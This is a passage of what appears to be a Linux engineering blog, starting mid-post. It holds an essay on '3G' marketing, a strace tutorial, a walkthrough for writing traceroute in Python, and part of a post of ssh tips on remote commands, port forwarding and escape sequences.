Those of you who care about these things will probably be jumping up and down right now, and/or closing the browser window. "EDGE isn't 3G!" you are saying. "It's 2.9G at best! And neither is 1xRTT, which is all the Sanyo SCP-6200 had. That's barely 2.5G! Maybe 2.75G on a clear day."

These people, who while enthusiastic sometimes seem to have been born yesterday, would point to the kerfuffle when Apple released the original iPhone in 2007 for Cingular and only supported EDGE. As the Wall Street Journal wrote:

Detractors and fans are going toe to toe on online forums. Much of the latest criticism is zooming in on Apple's choice of technologies to use with the new phone and its decision to partner exclusively with AT&T Inc.'s Cingular Wireless, which is being rebranded as AT&T.

For example, the iPhone won't use the fastest wireless Internet connection available, relying on so-called second-generation, or 2G, rather than faster 3G networks now being rolled out by major wireless carriers. Because of this, industry experts expect features of the iPhone such as Web browsing and downloading not to be very fast.

Tim Cook, Apple's chief operating officer, said during a conference call with analysts yesterday the company is sold on Cingular's 2G EDGE network because "it's much more widespread and widely deployed in the U.S." Mr. Cook didn't comment on whether Apple will eventually support 3G but said, "Obviously we would be where the technology is over time." Some people refer to EDGE as 2.5G.

By 2007, Cingular/AT&T was happy to downgrade its EDGE offerings in favor of a newer kind of 3G (known as W-CDMA or UMTS). From an interview with AT&T's chief, Randall Stephenson, in the New York Times in June 2007:
''I got to tell you, carrying this thing around and experiencing those kinds of speeds on a wireless handset, your imagination begins to run in terms of what's possible,'' he said, ''and by the way, there's not a 3G network available in Ottumwa, Iowa,'' referring to the so-called third generation of Web-enabled cellphones that require faster networks. ''If you want to sell these devices in a variety of places, Edge is the only opportunity you have.''

AT&T has invested $16 billion in its network over the last two years, and the network is now designed to handle the expected increase in wireless data users, he said, adding: ''Capacity won't be an issue. The network is ready.''

Ok, what are some quick takeaways here?
  • What Sprint sold as "3G" in 2002 (1xRTT voice), it rescinded later that year and relabeled the phones.
  • What counted as "3G" for Sprint in 2003 (1xRTT data), isn't any more either.
  • What in 2004 constituted "true 'third generation' (3G)" to Cingular/AT&T, the company had retroactively downgraded to 2G or 2.5G or 2.9G by 2007.
  • From an engineer's perspective, the 3G interfaces, if you read a book on telecom engineering, are CDMA2000 (including 1xRTT and EV-DO), EDGE, and W-CDMA (including UMTS, with or without HSUPA and HSDPA). The International Telecommunications Union has published a standard for third-generation wireless communications, known as IMT-2000, that includes those three and a few others.
  • To a first approximation, the first launch of "3G" in the United States, around 2002 and 2003, was a dud. The carriers responded by dusting themselves off, redoubling their efforts, deploying a new thing and retroactively downgrading their old "3G" product to be... some smaller number of G's. "3G" itself it not a technical term with a whole lot of meaning, especially as it lumps together so many incompatible, competing air interface protocols. The situation for consumers was less confused in Europe, where GSM and W-CDMA are dominant, governments auctioned new frequencies set aside for "3G," and the carrier offerings were more distinct.
  • The same song-and-dance is likely to play out over "4G" -- a term that engineers tentatively apply to a forthcoming ITU standard called IMT-Advanced, and carriers apply to whatever they want you to buy now. You might notice that Sprint is currently selling Mobile WiMAX as "4G." Mobile WiMAX is part of IMT-2000 -- the 3G standard. Verizon Wireless is selling something called "LTE" as "4G" -- it ain't in IMT-Advanced either. Today's "4G" products are like the "3G" of 2002 and 2003 -- they will become "3.75G" as soon as the next hot thing comes out.

But the point I really want to make is: this is all a red herring. Focusing on the protocol between your cell phone and the tower -- or worse, spending money on that basis -- is letting yourself be distracted. It's like the secret pick-me-up in Geritol, concocted by Madison Avenue instead of a chemist.

A cell phone is essentially sharing a swath of radio spectrum with a bunch of other people within a cell. Think of it like a cable modem or any other ISP. You can have the world's most sophisticated modem, but if it's trying to talk in a tiny slice of spectrum shared with everybody else within miles around (because there aren't enough towers to divide you up into cells), it'll still be awful.

Consider, for example, the performance I get from a Verizon "3G" USB modem: 3060 packets transmitted, 3007 received, 1% packet loss, time 3061925ms rtt min/avg/max/mdev = 121.554/404.199/22307.520/1213.055 ms, pipe 23

Pretty sad! But hey, it's 3G. In truth, a lot of boring factors control the performance of your cell phone data transmissions, principally:

  1. How much spectrum has the carrier licensed in my city, and how much is allocated to this kind of modulation?
  2. How many other people am I sharing the local tower with? In other words, how big is my cell, and how many towers has the carrier built or contracted with?
  3. How much throughput are my cellmates trying to consume?
  4. How much throughput has the carrier built in its back-end network connecting to the tower?

You might notice that all of these meat-and-potatoes factors involve the carrier spending money, and they all involve gradual improvement in behind-the-scenes infrastructure that's hard to get customers excited. Persuading you to buy a new cell phone with a sophisticated modem and sign up for a two-year contract is a different story. So they don't sell you something measurable where they could be held accountable; they sell how sweet it feels to be using a sophisticated radio modem protocol to talk to them.

Don't get me wrong -- UMTS and EV-DO are sophisticated protocols, and a lot of smart people and clever techniques made them legitimate engineering accomplishments. But the boring factors -- the raw resources being shared among the nearby customers -- dictate your performance just as much as incremental improvements in the air interface. What we really ought to care about is the same as with any Internet service provider -- the throughput and latency and reliability you get to the endpoints you want to reach. That's what matters, not the sophistication of one piece of the puzzle.

If the carrier sold you "384 kbps Internet access anywhere in the coverage area, outdoors," that would be something you could hold them accountable for. The carrier might even have to put a brake on signing up new customers until it could build new towers or license more spectrum for everybody to share, if it made that guarantee.

Some have proposed even more freely enterprising business models -- like having your phone get minute-to-minute bids from the local towers on who will carry your traffic for what price, and accept the lowest bidder who offers acceptable performance.

Selling you "3G" -- well, that's a lot easier to live up to. And it changes every year. So don't tell me how many G's your new phone has. We've loved and lost so many G's at this point. Tell me you got a new phone where you pay to get 1 Mbps and 100 ms rtt to major exchange points. When the market moves forward enough to make that a reality, that'll be a generation worth celebrating.

~keithw

Thursday Aug 05, 2010

Strace -- The Sysadmin's Microscope

Sometimes as a sysadmin the logfiles just don't cut it, and to solve a problem you need to know what's really going on. That's when I turn to strace -- the system-call tracer.

A system call, or syscall, is where a program crosses the boundary between user code and the kernel. Fortunately for us using strace, that boundary is where almost everything interesting happens in a typical program.

The two basic jobs of a modern operating system are abstraction and multiplexing. Abstraction means, for example, that when your program wants to read and write to disk it doesn't need to speak the SATA protocol, or SCSI, or IDE, or USB Mass Storage, or NFS. It speaks in a single, common vocabulary of directories and files, and the operating system translates that abstract vocabulary into whatever has to be done with the actual underlying hardware you have. Multiplexing means that your programs and mine each get fair access to the hardware, and don't have the ability to step on each other -- which means your program can't be permitted to skip the kernel, and speak raw SATA or SCSI to the actual hardware, even if it wanted to.

So for almost everything a program wants to do, it needs to talk to the kernel. Want to read or write a file? Make the open() syscall, and then the syscalls read() or write(). Talk on the network? You need the syscalls socket(), connect(), and again read() and write(). Make more processes? First clone() (inside the standard C library function fork()), then you probably want execve() so the new process runs its own program, and you probably want to interact with that process somehow, with one of wait4(), kill(), pipe(), and a host of others. Even looking at the clock requires a system call, clock_gettime(). Every one of those system calls will show up when we apply strace to the program.

In fact, just about the only thing a process can do without making a telltale system call is pure computation -- using the CPU and RAM and nothing else. As a former algorithms person, that's what I used to think was the fun part. Fortunately for us as sysadmins, very few real-life programs spend very long in that pure realm between having to deal with a file or the network or some other part of the system, and then strace picks them up again.

Let's look at a quick example of how strace solves problems.

Use #1: Understand A Complex Program's Actual Behavior
One day, I wanted to know which Git commands take out a certain lock -- I had a script running a series of different Git commands, and it was failing sometimes when run concurrently because two commands tried to hold the lock at the same time.

Now, I love sourcediving, and I've done some Git hacking, so I spent some time with the source tree investigating this question. But this code is complex enough that I was still left with some uncertainty. So I decided to get a plain, ground-truth answer to the question: if I run "git diff", will it grab this lock?

Strace to the rescue. The lock is on a file called index.lock. Anything trying to touch the file will show up in strace. So we can just trace a command the whole way through and use grep to see if index.lock is mentioned:

$ strace git status 2>&1 >/dev/null | grep index.lock
open(".git/index.lock", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
rename(".git/index.lock", ".git/index") = 0

$ strace git diff 2>&1 >/dev/null | grep index.lock
$

So git status takes the lock, and git diff doesn't.

Interlude: The Toolbox
To help make it useful for so many purposes, strace takes a variety of options to add or cut out different kinds of detail and help you see exactly what's going on.

In Medias Res, If You Want
Sometimes we don't have the luxury of starting a program over to run it under strace -- it's running, it's misbehaving, and we need to find out what's going on. Fortunately strace handles this case with ease. Instead of specifying a command line for strace to execute and trace, just pass -p PID where PID is the process ID of the process in question -- I find pstree -p invaluable for identifying this -- and strace will attach to that program, while it's running, and start telling you all about it.

Times
When I use strace, I almost always pass the -tt option. This tells me when each syscall happened -- -t prints it to the second, -tt to the microsecond. For system administration problems, this often helps a lot in correlating the trace with other logs, or in seeing where a program is spending too much time.

For performance issues, the -T option comes in handy too -- it tells me how long each individual syscall took from start to finish.

Data
By default strace already prints the strings that the program passes to and from the system -- filenames, data read and written, and so on. To keep the output readable, it cuts off the strings at 32 characters. You can see more with the -s option -- -s 1024 makes strace print up to 1024 characters for each string -- or cut out the strings entirely with -s 0.

Sometimes you want to see the full data flowing in just a few directions, without cluttering your trace with other flows of data. Here the options -e read= and -e write= come in handy.

For example, say you have a program talking to a database server, and you want to see the SQL queries, but not the voluminous data that comes back. The queries and responses go via write() and read() syscalls on a network socket to the database. First, take a preliminary look at the trace to see those syscalls in action:

$ strace -p 9026
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
[...]

Those write() syscalls are the SQL queries -- we can make out the SELECT foo FROM bar, and then it trails off. To see the rest, note the file descriptor the syscalls are happening on -- the first argument of read() or write(), which is 3 here. Pass that file descriptor to -e write=:

$ strace -p 9026 -e write=3
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
 | 00000  30 00 00 00 03 53 45 4c  45 43 54 20 74 69 6d 65  0....SEL ECT time |
 | 00010  73 74 61 6d 70 20 46 52  4f 4d 20 61 72 74 69 66  stamp FR OM artif |
 | 00020  61 63 74 73 20 57 48 45  52 45 20 69 64 20 3d 20  acts WHE RE id =  |
 | 00030  31 34 35 34                                       1454              |

and we see the whole query. It's both printed and in hex, in case it's binary. We could also get the whole thing with an option like -s 1024, but then we'd see all the data coming back via read() -- the use of -e write= lets us pick and choose.

Filtering the Output
Sometimes the full syscall trace is too much -- you just want to see what files the program touches, or when it reads and writes data, or some other subset. For this the -e trace= option was made. You can select a named suite of system calls like -e trace=file (for syscalls that mention filenames) or -e trace=desc (for read() and write() and friends, which mention file descriptors), or name individual system calls by hand. We'll use this option in the next example.

Child Processes
Sometimes the process you trace doesn't do the real work itself, but delegates it to child processes that it creates. Shell scripts and Make runs are notorious for taking this behavior to the extreme. If that's the case, you may want to pass -f to make strace "follow forks" and trace child processes, too, as soon as they're made.

For example, here's a trace of a simple shell script, without -f:

$ strace -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
[...]
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f4b68af5770) = 11948
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 11948
--- SIGCHLD (Child exited) @ 0 (0) --
wait4(-1, 0x7fffc3473604, WNOHANG, NULL) = -1 ECHILD (No child processes)

Not much to see here -- all the real work was done inside process 11948, the one created by that clone() syscall.

Here's the same script traced with -f (and the trace edited for brevity):

$ strace -f -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
[...]
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(Process 10738 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5a93f99770) = 10738
[pid 10682] wait4(-1, Process 10682 suspended

[pid 10738] open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
[pid 10738] dup2(3, 1)                  = 1
[pid 10738] close(3)                    = 0
[pid 10738] execve("/bin/ls", ["ls", ".git/objects/28"], [/* 25 vars */]) = 0
[... setup of C standard library omitted ...]
[pid 10738] stat(".git/objects/28", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
[pid 10738] open(".git/objects/28", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
[pid 10738] getdents(3, /* 40 entries */, 4096) = 2480
[pid 10738] getdents(3, /* 0 entries */, 4096) = 0
[pid 10738] close(3)                    = 0
[pid 10738] write(1, "04102fadac20da3550d381f444ccb5676"..., 1482) = 1482
[pid 10738] close(1)                    = 0
[pid 10738] close(2)                    = 0
[pid 10738] exit_group(0)               = ?
Process 10682 resumed
Process 10738 detached
<... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 10738
--- SIGCHLD (Child exited) @ 0 (0) ---

Now this trace could be a miniature education in Unix in itself -- future blog post? The key thing is that you can see ls do its work, with that open() call followed by getdents().

The output gets cluttered quickly when multiple processes are traced at once, so sometimes you want -ff, which makes strace write each process's trace into a separate file.

Use #2: Why/Where Is A Program Stuck?
Sometimes a program doesn't seem to be doing anything. Most often, that means it's blocked in some system call. Strace to the rescue.

$ strace -p 22067
Process 22067 attached - interrupt to quit
flock(3, LOCK_EX

Here it's blocked trying to take out a lock, an exclusive lock (LOCK_EX) on the file it's opened as file descriptor 3. What file is that?

$ readlink /proc/22067/fd/3
/tmp/foobar.lock

Aha, it's the file /tmp/foobar.lock. And what process is holding that lock?

$ lsof | grep /tmp/foobar.lock
 command   21856       price    3uW     REG 253,88       0 34443743 /tmp/foobar.lock
 command   22067       price    3u      REG 253,88       0 34443743 /tmp/foobar.lock

Process 21856 is holding the lock. Now we can go figure out why 21856 has been holding the lock for so long, whether 21856 and 22067 really need to grab the same lock, etc.

Other common ways the program might be stuck, and how you can learn more after discovering them with strace:

  • Waiting on the network. Use lsof again to see the remote hostname and port.
  • Trying to read a directory. Don't laugh -- this can actually happen when you have a giant directory with many thousands of entries. And if the directory used to be giant and is now small again, on a traditional filesystem like ext3 it becomes a long list of "nothing to see here" entries, so a single syscall may spend minutes scanning the deleted entries before returning the list of survivors.
  • Not making syscalls at all. This means it's doing some pure computation, perhaps a bunch of math. You're outside of strace's domain; good luck.

Uses #3, #4, ...
A post of this length can only scratch the surface of what strace can do in a sysadmin's toolbox. Some of my other favorites include

  • As a progress bar. When a program's in the middle of a long task and you want to estimate if it'll be another three hours or three days, strace can tell you what it's doing right now -- and a little cleverness can often tell you how far that places it in the overall task.
  • Measuring latency. There's no better way to tell how long your application takes to talk to that remote server than watching it actually read() from the server, with strace -T as your stopwatch.
  • Identifying hot spots. Profilers are great, but they don't always reflect the structure of your program. And have you ever tried to profile a shell script? Sometimes the best data comes from sending a strace -tt run to a file, and picking through to see when each phase of your program started and finished.
  • As a teaching and learning tool. The user/kernel boundary is where almost everything interesting happens in your system. So if you want to know more about how your system really works -- how about curling up with a set of man pages and some output from strace?

~price

Thursday Jul 29, 2010

Choose Your Own Sysadmin Adventure

Today is System Administrator Appreciation Day, and being system administrators ourselves,  we here at Ksplice decided to have a little fun with this holiday.

We've taken a break, drank way too much coffee, and created a very special Choose Your Own Adventure for all the system administrators out there.

Click here to begin the adventure.

Feedback and comments welcome. Above all: Happy System Administrator Appreciation Day. Share the love with your friends, colleagues, and especially any sysadmins you might know.

~ternus

Wednesday Jul 28, 2010

Learning by doing: Writing your own traceroute in 8 easy steps

Anyone who administers even a moderately sized network knows that when problems arise, diagnosing and fixing them can be extremely difficult. They're usually non-deterministic and difficult to reproduce, and very similar symptoms (e.g. a slow or unreliable connection) can be caused by any number of problems — congestion, a broken router, a bad physical link, etc.

One very useful weapon in a system administrator's arsenal for dealing with network issues is traceroute (or tracert, if you use Windows). This is a neat little program that will print out the path that packets take to get from the local machine to a destination — that is, the sequence of routers that the packets go through.

Using traceroute is pretty straightforward. On a UNIX-like system, you can do something like the following:

    $ traceroute google.com
    traceroute to google.com (173.194.33.104), 30 hops max, 60 byte packets
     1  router.lan (192.168.1.1)  0.595 ms  1.276 ms  1.519 ms
     2  70.162.48.1 (70.162.48.1)  13.669 ms  17.583 ms  18.242 ms
     3  ge-2-20-ur01.cambridge.ma.boston.comcast.net (68.87.36.225)  18.710 ms  19.192 ms  19.640 ms
     4  be-51-ar01.needham.ma.boston.comcast.net (68.85.162.157)  20.642 ms  21.160 ms  21.571 ms
     5  pos-2-4-0-0-cr01.newyork.ny.ibone.comcast.net (68.86.90.61)  28.870 ms  29.788 ms  30.437 ms
     6  pos-0-3-0-0-pe01.111eighthave.ny.ibone.comcast.net (68.86.86.190)  30.911 ms  17.377 ms  15.442 ms
     7  as15169-3.111eighthave.ny.ibone.comcast.net (75.149.230.194)  40.081 ms  41.018 ms  39.229 ms
     8  72.14.238.232 (72.14.238.232)  20.139 ms  21.629 ms  20.965 ms
     9  216.239.48.24 (216.239.48.24)  25.771 ms  26.196 ms  26.633 ms
    10 173.194.33.104 (173.194.33.104)  23.856 ms  24.820 ms  27.722 ms

Pretty nifty. But how does it work? After all, when a packet leaves your network, you can't monitor it anymore. So when it hits all those routers, the only way you can know about that is if one of them tells you about it.

The secret behind traceroute is a field called "Time To Live" (TTL) that is contained in the headers of the packets sent via the Internet Protocol. When a host receives a packet, it checks if the packet's TTL is greater than 1 before sending it on down the chain. If it is, it decrements the field. Otherwise, it drops the packet and sends an ICMP TIME_EXCEEDED packet to the sender. This packet, like all IP packets, contains the address of its sender, i.e. the intermediate host.

traceroute works by sending consecutive requests to the same destination with increasing TTL fields. Most of these attempts result in messages from intermediate hosts saying that the packet was dropped. The IP addresses of these intermediate hosts are then printed on the screen (generally with an attempt made at determining the hostname) as they arrive, terminating when the maximum number of hosts have been hit (on my machine's traceroute the default maximum is 30, but this is configurable), or when the intended destination has been reached.

The rest of this post will walk through implementing a very primitive version of traceroute in Python. The real traceroute is of course more complicated than what we will create, with many configurable features and modes. Still, our version will implement the basic functionality, and at the end, we'll have a really nice and short Python script that will do just fine for performing a simple traceroute.

So let's begin. Our algorithm, at a high level, is an infinite loop whose body creates a connection, prints out information about it, and then breaks out of the loop if a certain condition has been reached. So we can start with the following skeletal code:

    def main(dest):
        while True:
            # ... open connections ...
            # ... print data ...
            # ... break if useful ...
            pass

    if __name__ == "__main__":
        main('google.com')

Step 1: Turn a hostname into an IP address.

The socket module provides a gethostbyname() method that attempts to resolve a domain name into an IP address:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        while True:
            # ... open connections ...
            # ... print data ...
            # ... break if useful ...
            pass

    if __name__ == "__main__":
        main('google.com')
Step 2: Create sockets for the connections.

We'll need two sockets for our connections — one for receiving data and one for sending. We have a lot of choices for what kind of probes to send; let's use UDP probes, which require a datagram socket (SOCK_DGRAM). The routers along our traceroute path are going to send back ICMP packets, so for those we need a raw socket (SOCK_RAW).

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 3: Set the TTL field on the packets.

We'll simply use a counter which begins at 1 and which we increment with each iteration of the loop. We set the TTL using the setsockopt module of the socket object:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 4: Bind the sockets and send some packets.

Now that our sockets are all set up, we can put them to work! We first tell the receiving socket to listen to connections from all hosts on a specific port (most implementations of traceroute use ports from 33434 to 33534 so we will use 33434 as a default). We do this using the bind() method of the receiving socket object, by specifying the port and an empty string for the hostname. We can then use the sendto() method of the sending socket object to send to the destination host (on the same port). The first argument of the sendto() method is the data to send; in our case, we don't actually have anything specific we want to send, so we can just give the empty string:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')
Step 5: Get the intermediate hosts' IP addresses.

Next, we need to actually get our data from the receiving socket. For this, we can use the recvfrom() method of the object, whose return value is a tuple containing the packet data and the sender's address. In our case, we only care about the latter. Note that the address is itself actually a tuple containing both the IP address and the port, but we only care about the former. recvfrom() takes a single argument, the blocksize to read — let's go with 512.

It's worth noting that some administrators disable receiving ICMP ECHO requests, pretty much specifically to prevent the use of utilities like traceroute, since the detailed layout of a network can be sensitive information (another common reason to disable them is the ping utility, which can be used for denial-of-service attacks). It is therefore completely possible that we'll get a timeout error, which will result in an exception. Thus, we'll wrap this call in a try/except block. Traditionally, traceroute prints asterisks when it can't get the address of a host. We'll do the same once we print out results.

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')
Step 6: Turn the IP addresses into hostnames and print the data.

To match traceroute's behavior, we want to try to display the hostname along with the IP address. The socket module provides the gethostbyaddr() method for reverse DNS resolution. The resolution can fail and result in an exception, in which case we'll want to catch it and make the hostname the same as the address. Once we get the hostname, we have all the information we need to print our data:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            curr_name = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
                try:
                    curr_name = socket.gethostbyaddr(curr_addr)[0]
                except socket.error:
                    curr_name = curr_addr
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            if curr_addr is not None:
                curr_host = "%s (%s)" % (curr_name, curr_addr)
            else:
                curr_host = "*"
            print "%d\t%s" % (ttl, curr_host)

            ttl += 1
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 7: End the loop.

There are two conditions for exiting our loop — either we have reached our destination (that is, curr_addr is equal to dest_addr)1 or we have exceeded some maximum number of hops. We will set our maximum at 30:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        max_hops = 30
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            curr_name = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
                try:
                    curr_name = socket.gethostbyaddr(curr_addr)[0]
                except socket.error:
                    curr_name = curr_addr
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            if curr_addr is not None:
                curr_host = "%s (%s)" % (curr_name, curr_addr)
            else:
                curr_host = "*"
            print "%d\t%s" % (ttl, curr_host)

            ttl += 1
            if curr_addr == dest_addr or ttl &gt; max_hops:
                break

    if __name__ == "__main__":
        main('google.com')

Step 8: Run the code!

We're done! Let's save this to a file and run it! Because raw sockets require root privileges, traceroute is typically setuid. For our purposes, we can just run the script as root:

    $ sudo python poor-mans-traceroute.py
    [sudo] password for leonidg:
    1       router.lan (192.168.1.1)
    2       70.162.48.1 (70.162.48.1)
    3       ge-2-20-ur01.cambridge.ma.boston.comcast.net (68.87.36.225)
    4       be-51-ar01.needham.ma.boston.comcast.net (68.85.162.157)
    5       pos-2-4-0-0-cr01.newyork.ny.ibone.comcast.net (68.86.90.61)
    6       pos-0-3-0-0-pe01.111eighthave.ny.ibone.comcast.net (68.86.86.190)
    7       as15169-3.111eighthave.ny.ibone.comcast.net (75.149.230.194)
    8       72.14.238.232 (72.14.238.232)
    9       216.239.48.24 (216.239.48.24)
    10     173.194.33.104 (173.194.33.104)

Hurrah! The data matches the real traceroute's perfectly.

Of course, there are many improvements that we could make. As I mentioned, the real traceroute has a whole slew of other features, which you can learn about by reading the manpage. In the meantime, I wrote a slightly more complete version of the above code that allows configuring the port and max number of hops, as well as specifying the destination host. You can download it at my github repository.

Alright folks, What UNIX utility should we write next? strace, anyone? :-) 2

1 This is actually not quite how the real traceroute works. Rather than checking the IP addresses of the hosts and stopping when the destination address matches, it stops when it receives a ICMP "port unreachable" message, which means that the host has been reached. For our purposes, though, this simple address heuristic is good enough.

2 Ksplice blogger Nelson took up a DIY strace on his personal blog, Made of Bugs.

~leonidg

Monday Jul 26, 2010

Six things I wish Mom told me (about ssh)

If you've ever seriously used a Linux system, you're probably already familiar with at least the basics of ssh. But you're hungry for more. In this post, we'll show you six ssh tips that'll help take you to the next level. (We've also found that they make for excellent cocktail party conversation talking points.)

(1) Take command!

Everyone knows that you can use ssh to get a remote shell, but did you know that you can also use it to run commands on their own? Well, you can--just stick the command name after the hostname! Case in point:

wdaher@rocksteady:~$ ssh bebop uname -a
Linux bebop 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 05:14:15 UTC 2010 x86_64 GNU/Linux

Combine this with passwordless ssh logins, and your shell scripting powers have just leveled up. Want to figure out what version of Python you have installed on each of your systems? Just stick ssh hostname python -V in a for loop, and you're done!

Some commands, however, don't play along so nicely:

wdaher@rocksteady:~$ ssh bebop top
TERM environment variable not set.

What gives? Some programs need a pseudo-tty, and aren't happy if they don't have one (anything that wants to draw on arbitrary parts of the screen probably falls into this category). But ssh can handle this too--the -t option will force ssh to allocate a pseudo-tty for you, and then you'll be all set.

# Revel in your process-monitoring glory
wdaher@rocksteady:~$ ssh bebop -t top
# Or, resume your session in one command, if you're a GNU Screen user
wdaher@rocksteady:~$ ssh bebop -t screen -dr

(2) Please, try a sip of these ports

But wait, there's more! ssh's ability to forward ports is incredibly powerful. Suppose you have a web dashboard at work that runs at analytics on port 80 and is only accessible from the inside the office, and you're at home but need to access it because it's 2 a.m. and your pager is going off.

Fortunately, you can ssh to your desktop at work, desktop, which is on the same network as analytics. So if we can connect to desktop, and desktop can connect to analytics, surely we can make this work, right?

Right. We'll start out with something that doesn't quite do what we want:

wdaher@rocksteady:~$ ssh desktop -L 8080:desktop:80

OK, the ssh desktop is the straightforward part. The -L port:hostname:hostport option says "Set up a port forward from port (in this case, 8080) to hostname:hostport (in this case, desktop:80)."

So now, if you visit http://localhost:8080/ in your web browser at home, you'll actually be connected to port 80 on desktop. Close, but not quite! Remember, we wanted to connect to the web dashboard, running on port 80, on analytics, not desktop.

All we do, though, is adjust the command like so:

wdaher@rocksteady:~$ ssh desktop -L 8080:analytics:80

Now, the remote end of the port forward is analytics:80, which is precisely where the web dashboard is running. But wait, isn't analytics behind the firewall? How can we even reach it? Remember: this connection is being set up on the remote system (desktop), which is the only reason it works.

If you find yourself setting up multiple such forwards, you're probably better off doing something more like:

wdaher@rocksteady:~$ ssh -D 8080 desktop

This will set up a SOCKS proxy at localhost:8080. If you configure your browser to use it, all of your browser traffic will go over SSH and through your remote system, which means you could just navigate to http://analytics/ directly.

(3) Til-de do us part

Riddle me this: ssh into a system, press Enter a few times, and then type in a tilde. Nothing appears. Why?

Because the tilde is ssh's escape character. Right after a newline, you can type ~ and a number of other keystrokes to do interesting things to your ssh connection (like give you 30 extra lives in each continue.) ~? will display a full list of the escape sequences, but two handy ones are ~. and ~^Z.

